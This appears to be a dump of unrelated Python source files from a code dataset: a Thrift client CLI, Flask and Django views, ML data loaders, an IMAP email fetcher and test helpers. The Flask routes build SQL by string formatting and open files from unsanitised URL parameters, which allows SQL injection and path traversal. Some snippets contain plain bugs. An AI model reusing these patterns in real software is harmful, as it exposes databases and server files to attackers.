if sys.argv[argi] == '-f' or sys.argv[argi] == '-framed':
framed = True
argi += 1
cmd = sys.argv[argi]
args = sys.argv[argi+1:]
if http:
transport = THttpClient.THttpClient(host, port, uri)
else:
socket = TSocket.TSocket(host, port)
if framed:
transport = TTransport.TFramedTransport(socket)
else:
transport = TTransport.TBufferedTransport(socket)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = INotificationsThriftService.Client(protocol)
transport.open()
if cmd == 'sendInf':
if len(args) != 1:
print 'sendInf requires 1 args'
sys.exit(1)
pp.pprint(client.sendInf(eval(args[0]),))
elif cmd == 'batchSendInf':
if len(args) != 1:
print 'batchSendInf requires 1 args'
sys.exit(1)
pp.pprint(client.batchSendInf(eval(args[0]),))
elif cmd == 'markProcessed':
if len(args) != 1:
print 'markProcessed requires 1 args'
sys.exit(1)
pp.pprint(client.markProcessed(args[0],))
elif cmd == 'markRead':
if len(args) != 1:
print 'markRead requires 1 args'
sys.exit(1)
pp.pprint(client.markRead(args[0],))
elif cmd == 'queryInfo':
if len(args) != 4:
print 'queryInfo requires 4 args'
sys.exit(1)
pp.pprint(client.queryInfo(args[0],args[1],args[2],args[3],))
elif cmd == 'replaceInf':
if len(args) != 1:
print 'replaceInf requires 1 args'
sys.exit(1)
pp.pprint(client.replaceInf(eval(args[0]),))
elif cmd == 'batchReplaceInf':
if len(args) != 1:
print 'batchReplaceInf requires 1 args'
sys.exit(1)
pp.pprint(client.batchReplaceInf(eval(args[0]),))
elif cmd == 'listAll':
if len(args) != 4:
print 'listAll requires 4 args'
sys.exit(1)
pp.pprint(client.listAll(args[0],args[1],eval(args[2]),eval(args[3]),))
elif cmd == 'listAllOfApp':
if len(args) != 5:
print 'listAllOfApp requires 5 args'
sys.exit(1)
pp.pprint(client.listAllOfApp(args[0],args[1],args[2],eval(args[3]),eval(args[4]),))
elif cmd == 'listById':
if len(args) != 4:
print 'listById requires 4 args'
sys.exit(1)
pp.pprint(client.listById(args[0],args[1],eval(args[2]),eval(args[3]),))
elif cmd == 'listOfAppById':
if len(args) != 5:
print 'listOfAppById requires 5 args'
sys.exit(1)
pp.pprint(client.listOfAppById(args[0],args[1],args[2],eval(args[3]),eval(args[4]),))
elif cmd == 'listByTime':
if len(args) != 4:
print 'listByTime requires 4 args'
sys.exit(1)
pp.pprint(client.listByTime(args[0],args[1],eval(args[2]),eval(args[3]),))
elif cmd == 'listOfAppByTime':
if len(args) != 5:
print 'listOfAppByTime requires 5 args'
sys.exit(1)
pp.pprint(client.listOfAppByTime(args[0],args[1],args[2],eval(args[3]),eval(args[4]),))
elif cmd == 'top':
if len(args) != 3:
print 'top requires 3 args'
sys.exit(1)
pp.pprint(client.top(args[0],args[1],eval(args[2]),))
elif cmd == 'topOfApp':
if len(args) != 4:
print 'topOfApp requires 4 args'
sys.exit(1)
pp.pprint(client.topOfApp(args[0],args[1],args[2],eval(args[3]),))
elif cmd == 'count':
if len(args) != 2:
print 'count requires 2 args'
sys.exit(1)
pp.pprint(client.count(args[0],args[1],))
elif cmd == 'countOfApp':
if len(args) != 3:
print 'countOfApp requires 3 args'
sys.exit(1)
pp.pprint(client.countOfApp(args[0],args[1],args[2],))
elif cmd == 'send':
if len(args) != 1:
print 'send requires 1 args'
sys.exit(1)
pp.pprint(client.send(args[0],))
elif cmd == 'batchSend':
if len(args) != 1:
print 'batchSend requires 1 args'
sys.exit(1)
pp.pprint(client.batchSend(args[0],))
elif cmd == 'process':
if len(args) != 1:
print 'process requires 1 args'
sys.exit(1)
pp.pprint(client.process(args[0],))
elif cmd == 'query':
if len(args) != 4:
print 'query requires 4 args'
sys.exit(1)
pp.pprint(client.query(args[0],args[1],args[2],args[3],))
elif cmd == 'replace':
if len(args) != 1:
print 'replace requires 1 args'
sys.exit(1)
pp.pprint(client.replace(args[0],))
elif cmd == 'batchReplace':
if len(args) != 1:
print 'batchReplace requires 1 args'
sys.exit(1)
pp.pprint(client.batchReplace(args[0],))
else:
print 'Unrecognized method %s' % cmd
sys.exit(1)
transport.close()
|
997,786 | 078fa9899379ada11f6bd1ed346190b08a820ebf | import numpy as np
def loaddata():
return np.fromfile("ex1data1.txt", int, sep="\n")
if __name__ == "__mian__":
traindata = loaddata()
version = '1.0'
print(version.startswitch('1'))
print('end')
print("Hello the Pycharm!") |
997,787 | 8151b86e80afb1f028b48be72576361ddd041ff4 | from py1811.sungJuk import SungjukService
sjsrv = SungjukService.SungJukService()
std3 = sjsrv.readSungJuk()
print(std3)
sjsrv.computeSungJuk(std3)
print(std3)
|
997,788 | 68f6dc6f0dae3667a5633397655455e3b06cfb65 | import socket
from threading import Thread, Condition
from downloadInThread import MyThread
import argparse
from collections import deque
from Queue import Queue
condition = Condition()
queue = []
class Server(Thread):
def __init__(self,host,port,name):
Thread.__init__(self)
self.port = port
self.host = host
self.name = name
self.bufsize = 1024
self.addr = (host,port)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(self.addr)
def run(self):
self.socket.listen(5)
while True:
print 'Waiting for connection..'
client, caddr = self.socket.accept()
print 'Connected To',caddr
data = client.recv(self.bufsize)
if not data:
continue
print data
condition.acquire()
queue.append(data)
print "Produced", data
condition.notify()
condition.release()
if data == "END":
return
class Client(Thread):
def __init__(self,host,port,name, delays, txpower, mintxpower, maxtxpower, incThreshold, decThreshold):
Thread.__init__(self)
self.port = port
self.host = host
self.name = name
self.bufsize = 1024
self.addr = (host,port)
self.delays = delays
self.txpower = txpower
self.mintxpower = mintxpower
self.maxtxpower = maxtxpower
self.incThreshold = incThreshold
self.decThreshold = decThreshold
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
invalid = True
while invalid:
try:
invalid = False
self.socket.connect(self.addr)
except:
invalid = True
global queue
while True:
condition.acquire()
if not queue:
condition.wait()
num = queue.pop()
if num == "END":
return
num = float(num)
self.delays.append(num)
changePower = False
if len(self.delay) == self.delay.maxlen and self.delays.count(-1) >= self.incThreshold and self.txpower < self.maxtxpower:
self.txpower += 1
changePower = True
self.delays.clear()
elif len(self.delay) == self.delay.maxlen and self.delays.count(-1) <= self.decThreshold and self.txpower > self.mintxpower:
self.txpower -= 1
changePower = True
self.delays.clear()
if changePower:
commandVal = "set:tx-power:" + str(self.txpower)
print "Consumed", commandVal
self.socket.send(commandVal)
condition.release()
if __name__ == "__main__":
progName = "downloadInThread"
parser = argparse.ArgumentParser(prog = progName)
parser.add_argument("-s", "--baseIP", dest="baseIP", help="server address")
parser.add_argument("-c", "--commandIP", dest="commandIP", help="client address")
parser.add_argument("-a", "--basePort", dest="basePort", help="server port", type=int)
parser.add_argument("-b", "--commandPort", dest="commandPort", help="client port", type=int)
parser.add_argument("-n", "--name", dest="name", help="Name")
parser.add_argument("-d", "--downloadTime", dest="dTime", help="Download time")
parser.add_argument("-k", "--sleepTime", dest="sTime", help="Sleep time")
parser.add_argument("-i", "--iterations", dest="iteration", help="No. of iterations", type=int)
args = parser.parse_args()
downloaderQ = Queue()
downloaderThread = MyThread(downloaderQ, args=(True,))
server = Server(args.commandIP, args.commandPort, args.name)
client = Client(args.baseIP, args.basePort, args.name, deque(maxlen=15),22, 22, 27, 5, 2)
server.start()
client.start()
downloaderThread.start()
for i in range(0, args.iteration):
downloaderThread.queue.put("download:"+args.dTime)
downloaderThread.queue.put("sleep:"+args.sTime)
downloaderThread.queue.put(None)
downloaderThread.join()
server.join()
|
997,789 | a5e88040e0a54f491bc605325bc9ee484cf50ce6 | from django.shortcuts import render
from django.http import HttpResponse
import numpy as np
import pandas as pd
# Create your views here.
from sklearn.externals import joblib
classifier=joblib.load('./models/RFModelforMPG.pkl')
def index(request):
temp={}
temp['ageVal']=50
temp['bs_fastVal']=6.8
temp['bs_ppVal']=8.8
temp['plasma_rVal']=11.2
temp['plasma_fVal']=7.2
temp['hbA1cVal']=62
context ={'temp':temp}
return render(request,'index.html',context)
# return HttpResponse({'a':1})
def predictMPG(request):
context ={'temp':' '}
print (request)
if request.method == 'POST':
temp={}
temp['ageVal']=request.POST.get('ageVal')
temp['bs_fastVal']=request.POST.get('bs_fastVal')
temp['bs_ppVal']=request.POST.get('bs_ppVal')
temp['plasma_rVal']=request.POST.get('plasma_rVal')
temp['plasma_fVal']=request.POST.get('plasma_fVal')
temp['hbA1cVal']=request.POST.get('hbA1cVal')
# testDtaa=pd.DataFrame({'x':temp2}).transpose()
# scoreval=reloadModel.predict(testDtaa)[0]
# context={'scoreval':scoreval,'temp':temp}
#Datapreprocessing Convert the values to float
age = float(temp['ageVal'])
bs_fast = float(temp['bs_fastVal'])
bs_pp = float(temp['bs_ppVal'])
plasma_r = float(temp['plasma_rVal'])
plasma_f = float(temp['plasma_fVal'])
hbA1c = float(temp['hbA1cVal'])
result = [age,bs_fast,bs_pp,plasma_r,plasma_f,hbA1c]
#Passing data to model & loading the model from disks
#model_path = 'ml_model/model.pkl'
#classifier = pickle.load(open(model_path, 'rb'))
prediction = classifier.predict([result])[0]
conf_score = np.max(classifier.predict_proba([result]))*100
context ={'a':'Diabetes Prediction :' + prediction ,'temp':temp}
return render(request,'index.html',context) |
997,790 | 87c5d81d89e01ea4ab7ea4500a06abc5e69c7726 | import random
from signtest import compute_significance_two_tails
def crossvalidation(datas, class_count, disc, classifier, params={}, fold=10):
random.shuffle(datas)
one_fold_length = len(datas) / fold
fold_with_extra = len(datas) % fold
classification_rate = [0] * fold
start = 0
for i in xrange(0, fold):
classifier.reset()
if i < fold_with_extra:
last = start + one_fold_length + 1
else:
last = start + one_fold_length
test_set = datas[start:last]
train_set = datas[0:start] + datas[last:]
if params:
classifier.train(train_set, class_count, params)
else:
classifier.train(train_set, class_count)
print "{}th fold training over".format(i)
correct = len(filter(lambda (data, label): classifier.classify(data, params=params) == label, test_set))
classification_rate[i] = correct / float(len(test_set))
start = last
print "{}th fold over".format(i)
result = ""
result += "{} CR: {}, AVG: {}\n".format(disc, classification_rate,
sum(classification_rate) / len(classification_rate))
result += "\n\n"
print result
return result
# takes pre-precessed data - [(tokens, label)]
def crossvalidation_compare(datas, class_count, method1_disc, classifier_1, params_1, method2_disc, classifier_2,
params_2, fold=10):
random.shuffle(datas)
one_fold_length = len(datas) / fold
fold_with_extra = len(datas) % fold
classification_rate_1 = [0] * fold
classification_rate_2 = [0] * fold
start = 0
win_1 = 0
win_2 = 0
for i in xrange(0, fold):
correct_1 = 0
correct_2 = 0
classifier_1.reset()
classifier_2.reset()
if i < fold_with_extra:
last = start + one_fold_length + 1
else:
last = start + one_fold_length
test_set = datas[start:last]
train_set = datas[0:start] + datas[last:]
classifier_1.train(train_set, class_count, params_1)
classifier_2.train(train_set, class_count, params_2)
result = []
for data, expected in test_set:
result.append(
(expected, classifier_1.classify(data, params=params_1), classifier_2.classify(data, params=params_2)))
for expected, r_1, r_2 in result:
par = r_1 == r_2
if par:
win_1 += 0.5
win_2 += 0.5
if expected == r_1:
correct_1 += 1
if not par:
win_1 += 1
if expected == r_2:
correct_2 += 1
if not par:
win_2 += 1
classification_rate_1[i] = float(correct_1) / len(test_set)
classification_rate_2[i] = float(correct_2) / len(test_set)
start = last
win_1 = int(round(win_1))
win_2 = int(round(win_2))
result = ""
result += "{} CR: {}, AVG: {}\n".format(method1_disc, classification_rate_1,
sum(classification_rate_1) / len(classification_rate_1))
result += "{} CR: {}, AVG: {}\n".format(method2_disc, classification_rate_2,
sum(classification_rate_2) / len(classification_rate_2))
result += "Sig {}\n".format(compute_significance_two_tails(win_1, win_1 + win_2))
result += "\n\n"
print result
return result
|
997,791 | 004eeb38bf2503633fdfc373d0cded865cb870be | __author__ = "Nikhil Mehta"
__copyright__ = "--"
#---------------------------
import tensorflow as tf
import numpy as np
import os
class DataHandler:
def __init__(self, data_dir):
self.data_dir = data_dir
self.test_data_loaded = False
def load_data(self):
train_class_file = os.path.join(self.data_dir, 'trainclasses_ps.txt')
train_label_file = os.path.join(self.data_dir, 'trainLabels')
train_data_file = os.path.join(self.data_dir, 'trainData')
train_attr_file = os.path.join(self.data_dir, 'trainAttributes')
test_class_file = os.path.join(self.data_dir, 'testclasses_ps.txt')
test_label_file = os.path.join(self.data_dir, 'testLabels')
test_data_file = os.path.join(self.data_dir, 'testData')
all_attr_file = os.path.join(self.data_dir, 'dataAttributes')
all_class_file = os.path.join(self.data_dir, 'allclasses.txt')
if not os.path.exists(train_class_file) or \
not os.path.exists(train_label_file) or \
not os.path.exists(train_data_file) or \
not os.path.exists(train_attr_file) or \
not os.path.exists(test_class_file) or \
not os.path.exists(test_label_file) or \
not os.path.exists(test_data_file) or \
not os.path.exists(all_class_file) or \
not os.path.exists(all_attr_file):
raise IOError("File cannot be read")
self.all_classes = {}
with open(all_class_file, 'r') as f:
data = f.readlines()
for idx, cl in enumerate(data):
self.all_classes[cl.split()[0]] = idx
with open(test_class_file, 'r') as f:
data = f.readlines()
self.test_classes = [self.all_classes[x.split()[0]] for x in data]
with open(train_class_file, 'r') as f:
data = f.readlines()
self.train_classes = [self.all_classes[x.split()[0]] for x in data]
with open(all_attr_file) as f:
self.all_attr = np.load(f)
# Train files load
self.load_train_data(train_class_file, train_label_file, train_data_file, train_attr_file)
self.load_test_data(test_class_file, test_label_file, test_data_file, all_attr_file)
def preprocess_data(self):
print 'Preprocess'
# Do everything here so i can remove this function if i want to
# Preprocess c and x
self.epsilon = 1e-6
self.attr_mean = np.mean(self.all_attr, axis=0, keepdims=True) # Note all_attr (Seen and Unseen classes) available at training time
self.attr_std = np.std(self.all_attr, axis=0, keepdims=True)
print self.all_attr.shape
print self.attr_mean.shape
print self.attr_std.shape
self.train_attr = np.divide(self.train_attr - self.attr_mean, (self.attr_std + self.epsilon))
self.all_attr = np.divide(self.all_attr - self.attr_mean, (self.attr_std + self.epsilon))
self.test_attr = np.divide(self.test_attr - self.attr_mean, (self.attr_std + self.epsilon))
self.train_data_mean = np.mean(self.train_data, axis=0, keepdims=True)
self.train_data_std = np.std(self.train_data, axis=0, keepdims=True)
self.train_data = np.divide(self.train_data - self.train_data_mean, (self.train_data_std + self.epsilon))
# Here only preprocessing the test data
# Note: Test data has not been used for preprocessing (calculation of mean or std)
self.test_data = np.divide(self.test_data - self.train_data_mean, (self.train_data_std + self.epsilon))
def load_train_data(self, train_class_file, train_label_file, train_data_file, train_attr_file):
with open(train_label_file) as f:
self.train_label = np.load(f)
with open(train_data_file) as f:
self.train_data = np.load(f)
with open(train_attr_file) as f:
self.train_attr = np.load(f)
self.train_size = self.train_data.shape[0]
self.x_dim = self.train_data.shape[1]
self.attr_dim = self.train_attr.shape[1]
print 'Training Data: ' + str(self.train_data.shape)
print 'Training Attr: ' + str(self.train_attr.shape)
def load_test_data(self, test_class_file, test_label_file, test_data_file, all_attr_file):
with open(test_label_file) as f:
self.test_label = np.load(f)
with open(test_data_file) as f:
self.test_data = np.load(f)
self.test_attr = self.all_attr[self.test_classes]
self.test_size = self.test_data.shape[0]
print 'Testing Data: ' + str(self.test_data.shape)
print 'Testing Attr: ' + str(self.test_attr.shape)
print 'Testing Classes' + str(len(self.test_classes))
print 'Testin Labels' + str(self.test_label.shape)
def next_train_batch(self, index, batch_size):
start_index = index
end_index = index+batch_size
return self.train_data[start_index:end_index], self.train_attr[start_index:end_index]
def next_test_batch(self, index, batch_size):
start_index = index
end_index = index+batch_size
return self.test_data[start_index:end_index], self.test_attr[start_index:end_index]
|
997,792 | 585c4958b50e0d3e4d1deb43c8b607864cd66d52 | import os
import json
import logging
from flask import (Blueprint, flash, g, redirect, render_template, request,
url_for, make_response, send_from_directory)
from werkzeug.exceptions import abort
from app.db import get_db, close_db
from app.auth import login_required
bp = Blueprint('hw', __name__)
@bp.route('/hw_img/<context>', methods=('GET', 'POST'))
def hw_img(context):
import base64
img_stream = ''
with open('./files/hw/' + context + '/prob.png', 'rb') as f:
img_stream = f.read()
return img_stream
@bp.route('/sp_prob_img/<context>', methods=('GET', 'POST'))
def sp_prob_img(context):
import base64
img_stream = ''
with open('./files/sp_exe/' + context + '/prob.png', 'rb') as f:
img_stream = f.read()
return img_stream
@bp.route('/sp_ans_img/<context>', methods=('GET', 'POST'))
def sp_ans_img(context):
import base64
img_stream = ''
with open('./files/sp_exe/' + context + '/ans.png', 'rb') as f:
img_stream = f.read()
return img_stream
# Record hw_history
def record_hw_history(user_ip, operation, context=None):
if (g.user != '{}') and (g.user is not None):
user_id = json.loads(g.user)['id']
if (operation == 1 or operation == 2) and context:
db = get_db()
df = db.fetchall(
'SELECT id FROM hw_info WHERE context="{context}"'.format(
context=context))
hw_id = df.id[0]
db.execute(
'INSERT INTO hw_history (user_id, user_ip, hw_id, operation, time) VALUES ({user_id}, "{user_ip}", {hw_id}, {operation}, now())'
.format(user_id=user_id,
user_ip=user_ip,
hw_id=hw_id,
operation=operation))
db.commit()
close_db()
# Record sp_exe_history
def record_sp_exe_history(context,
user_ip,
operation,
ans="null",
difficulty="null",
answer_easy_if="null"):
db = get_db()
if (g.user != '{}') and (g.user is not None):
user_id = json.loads(g.user)['id']
df = db.fetchall(
'SELECT id FROM sp_exe_info WHERE context="{context}"'.format(
context=context))
sp_exe_id = df.id[0]
db.execute(
'INSERT INTO sp_exe_history (user_id, user_ip, sp_exe_id, operation, time, ans, difficulty, answer_easy_if) VALUES ({user_id}, "{user_ip}", {sp_exe_id}, {operation}, now(), {ans}, {difficulty}, {answer_easy_if})'
.format(user_id=user_id,
user_ip=user_ip,
sp_exe_id=sp_exe_id,
operation=operation,
ans=ans,
difficulty=difficulty,
answer_easy_if=answer_easy_if))
db.commit()
close_db()
# Check submit status with { user_id, hw_id }
def check_submitted(context, operation):
db = get_db()
if (g.user != '{}') and (g.user is not None):
user_id = json.loads(g.user)['id']
df = db.fetchall(
'SELECT id FROM hw_info WHERE context="{context}"'.format(
context=context))
hw_id = df.id[0]
df = db.fetchall(
'SELECT * FROM hw_history WHERE user_id="{user_id}" AND operation={operation} AND hw_id={hw_id}'
.format(user_id=user_id, operation=operation, hw_id=hw_id))
amount = len(df)
close_db()
if amount >= 1:
return True, df.iloc[0].time
elif amount == 0:
return False, None
else:
close_db()
return False, None
|
997,793 | 0202b0c94690844c29540f6b846e8da5ae07f91e | from tkinter.constants import END
from tkinter import simpledialog
from tkinter import messagebox
import imap_tools
attachment_path = "./attachment/"
dictionary_email = {}
login_list = []
def imap_login(window):
global login_list
while 1:
window.update_idletasks()
email = simpledialog.askstring("email", "inserisci la tua email")
window.update_idletasks()
password = simpledialog.askstring(
"password", "inserisci la tua password")
mailbox = imap_tools.MailBox("imap.gmail.com")
try:
mailbox = mailbox.login(email, password)
break
except Exception:
messagebox.showerror("Error", "Dati non validi")
login_list.append(email)
login_list.append(password)
print(mailbox)
return mailbox
def receive_email(listEmail, window):
global dictionary_email
s = ""
i = 0
mailbox = imap_login(window)
for msg in mailbox.fetch():
foo = []
print(f"Da: {msg.from_}\nOggetto: {msg.subject}\nBody: {msg.text}")
foo.append(f"Da: {msg.from_}")
foo.append(f"Oggetto: {msg.subject}")
foo.append(msg.text)
s += f"{msg.from_} {msg.subject}"
for att in msg.attachments:
print(f"Allegato: {att.filename}, {att.content_type}\n")
foo.append(f"Allegato: {att.filename}")
foo.append(att.payload)
dictionary_email[i] = foo
listEmail.insert(END, s)
i += 1
s = ""
def download_attachments(i):
temp = dictionary_email[i][len(dictionary_email[i])-2].split(" ")
filename = temp[len(temp)-1]
with open(attachment_path + filename, "wb") as f:
f.write(dictionary_email[i][len(dictionary_email[i])-1])
messagebox.showinfo("info", "Ho scaricato il file")
|
997,794 | 33689be0f96cf9020252dbf7df20f84b10b225ad | import os
import random
import string
from typing import Optional, Tuple
import healpy
import pytest
from precovery.orbit import Orbit
from precovery.sourcecatalog import SourceFrame, SourceObservation
def make_sourceobs(
exposure_id: str = "exposure",
id: Optional[bytes] = None,
obscode: str = "obs",
healpixel: Optional[int] = None,
nside: int = 32,
ra: float = 1.0,
dec: float = 2.0,
mjd: float = 50000.0,
exposure_mjd_start: float = 50000.0,
exposure_mjd_mid: float = 50000.0,
) -> SourceObservation:
"""Constructor for SourceObservations which provides default
values for anything unspecified, which makes test setup less
verbose.
"""
if id is None:
id = random_string(16).encode("utf8")
if healpixel is not None:
ra, dec = radec_for_healpixel(healpixel, nside)
return SourceObservation(
exposure_id=exposure_id,
obscode=obscode,
id=id,
mjd=mjd,
ra=ra,
dec=dec,
ra_sigma=3.0,
dec_sigma=4.0,
mag=5.0,
mag_sigma=6.0,
filter="filter",
exposure_mjd_start=exposure_mjd_start,
exposure_mjd_mid=exposure_mjd_mid,
exposure_duration=30,
)
def make_sourceobs_of_orbit(
orbit: Orbit,
obscode: str,
mjd: float = 50000.0,
):
ephem = orbit.compute_ephemeris(obscode=obscode, epochs=[mjd])[0]
obs = make_sourceobs(
mjd=mjd, exposure_mjd_mid=mjd, obscode=obscode, ra=ephem.ra, dec=ephem.dec
)
return obs
def make_sourceframe_with_observations(
n_observations: int,
exposure_id: str = "exposure",
obscode: str = "obs",
exposure_mjd_start: float = 50000.0,
exposure_mjd_mid: float = 50000.0,
healpixel: int = 1,
) -> SourceFrame:
"""Constructor for SourceFrames which provides default
values for anything unspecified, which makes test setup less
verbose. SourceObservations are generated and included.
"""
observations = [
make_sourceobs(
exposure_id=exposure_id,
obscode=obscode,
healpixel=healpixel,
mjd=exposure_mjd_mid,
exposure_mjd_start=exposure_mjd_start,
exposure_mjd_mid=exposure_mjd_mid,
)
for _ in range(n_observations)
]
return SourceFrame(
exposure_id=exposure_id,
obscode=obscode,
filter="filter",
exposure_mjd_start=exposure_mjd_start,
exposure_mjd_mid=exposure_mjd_mid,
exposure_duration=30.0,
healpixel=1,
observations=observations,
)
def radec_for_healpixel(healpixel: int, nside: int) -> Tuple[float, float]:
"""
Compute the ra and dec associated with a healpixel
"""
return healpy.pix2ang(nside=nside, ipix=healpixel, nest=True, lonlat=True)
def random_string(length: int):
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
requires_openorb_data = pytest.mark.skipif(
"OORB_DATA" not in os.environ,
reason="test requires propagation, so OORB_DATA environment variable must be set",
)
|
997,795 | c93638f3cd8de1b9d4950c3d8ceaaf46e477713d | from regularizationNetworks import MixGauss
import scipy.io as sio
import numpy as np
import os.path
[Xtr, Ytr] = MixGauss.mixgauss(np.matrix('0 1; 0 1'), np.matrix('0.5 0.25'), 100)
[Xts, Yts] = MixGauss.mixgauss(np.matrix('0 1; 0 1'), np.matrix('0.5 0.3'), 100)
flag = True
while flag:
file_name = raw_input('Insert the dataset name ')
file_name = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'datasets/'+file_name)
if os.path.isfile(file_name + '.mat'):
choose = raw_input('A file with this name already exists, do you want to override it? (y/n) ')
if choose == 'y':
flag = False
else:
flag = True
else:
flag = False
sio.savemat(file_name, {'Xtr': Xtr, 'Ytr': Ytr, 'Xts': Xts, 'Yts': Yts})
|
997,796 | a2a66aa34cdf521393e44e1ec95ea9c856391cdf | def sum(r):# 若函数中的局部变量和全局变量的变量名一样,那么优先使用局部变量
pi=3.14 # 局部变量
return (pi*2*r)
r=input("请输入半径:") # 全局变量
if r.isdigit():
print(sum(float(r)))
else:
print("输入有误")
|
997,797 | 8c1735f8b6a0d5a1f683bab7a39b2f66218405d4 | """Meat Engine
Copyright (C) 2007, Big Dice Games
One practical definition of a "game engine" is "the code you reuse on
your second game". That's mostly tongue-in-cheek, but it isn't far
from the philosophy of what's currently included in MeatEngine.
I've included a variety of pieces of code, not because they're all
appropriate for the game you want to make, and they're certainly not
all appropriate for any particular game, but instead, each piece might
be useful for some game, or for some game-related-project.
MeatEngine is more of a toolbox than a framework - you're responsible
for the main loop of your program. Some of the code makes certain
assumptions about being called periodically. This should not be
difficult to handle, regardless of the structure of your game.
Included (currently) are modules for adaptive music, GUI display, AI,
and low-level math. Also included is the beginnings of a ray tracer -
not that you'd want to use a ray tracer in your game (certainly not
this ray tracer, anyway), but it may be of benefit in creating
assets. Also, it serves as a test harness for the math module.
Version History
--------------------
0.0.1 - Initial packaging in advance of PyWeek5
"""
__all__ = ['MoodMusic', 'Math', 'Widgets', 'LookAhead', 'RayTrace']
__version__ = "0.0.1"
__docformat__="restructuredtext en"
|
997,798 | 3d75b0f9947e55bbc0a7b5bf6d88f5bd2c1ac33a | # Alec Dewulf
# "Hidden Palindrome" 2016 J3
# December 31, 2019
pal = input()
lengths = []
x = 1
y = 1
# getting lengths of palindromes that have a middle consisting of 1 letter
while x < len(pal) - 1:
# checking to make sure the guess is whithin the length of the palindrome
while (x + y) < len(pal) and (x - y) >= 0:
if pal[x - y] == pal[x + y]:
# multiply ans by two for the letters on both sides and
# add the middle
ans = (2 * y) + 1
lengths.append(ans)
y += 1
else:
break
y = 1
x += 1
y = 1
x = 1
# getting the lengths of palindromes that have a middle of 2 letters
while x < len(pal) - 1:
# checking for a two letter middle
if pal[x] == pal[x + 1]:
y = 1
# finding the largest palindrome
while (x + 1 + y) < len(pal):
# the digits after the two digit middle are the same
if pal[x - y] == pal[x + y + 1] and (x-y) >= 0:
ans = (2 * y) + 2
lengths.append(ans)
y +=1
else:
break
x += 1
#check the list for pals of length two
if len(lengths) == 0:
for i in range(len(pal)):
# if two of the same letters are beside each other
if (i+1) < len(pal):
if pal[i] == pal[i +1]:
lengths.append(2)
# returning the answer which is the greatest length found
if len(lengths) != 0:
print(max(lengths))
else:
print(1)
|
997,799 | 64dfc5c96aea30d0e420ba9ef1000325711638a6 | import math
import numpy
import matplotlib
matplotlib.use('TkAgg')
from skimage import io
from skimage import feature
from skimage import draw
from skimage import util
from skimage import color
from skimage import morphology
from skimage import filters
from skimage import measure
from skimage import transform
from skimage import exposure
from sklearn.neighbors import NearestNeighbors
from scipy import ndimage as ndi
#import matplotlib.pyplot as plt
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
import sys
if sys.version_info[0] < 3:
import Tkinter as Tk
from tkinter import messagebox
else:
import tkinter as Tk
from tkinter import messagebox
from scipy.spatial import Delaunay
import Si_Ring_Classes
import matplotlib.pyplot as plt
light_centers = False
#170908_SiO2@RuVII_STM110_det (27.4x11.5).jpg
save_figures = False
#Colors for each of the ring numbers
colors = [[178, 112, 248], [75, 176, 246], [67, 196, 127], [249, 222, 62], [249, 76, 62], [247, 38, 232]]
scaling_factor = 1
#Sets up the Tk window
root = Tk.Tk()
root.wm_title("Auto Ring Center Finder")
bin_list = [[5,6,7,8],[6,6,7],[6,6,6,6,6,8],[6,6,6,6,6,6]]
bin_mids = [0.5,1,1.5,2]
def Crystallinity(bin_list, bin_mids):
crys_list = []
for cur_list in bin_list:
num_sixes = cur_list.count(6)
crystallinity = num_sixes/len(cur_list)
crys_list.append(crystallinity)
plt.plot(bin_mids, crys_list, 'ro')
plt.axis([0, bin_mids[-1] + 1, 0, 1])
plt.title('Crystallinity')
plt.xlabel('Distance')
plt.ylabel('Crystallinity')
plt.show()
Crystallinity(bin_list, bin_mids) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.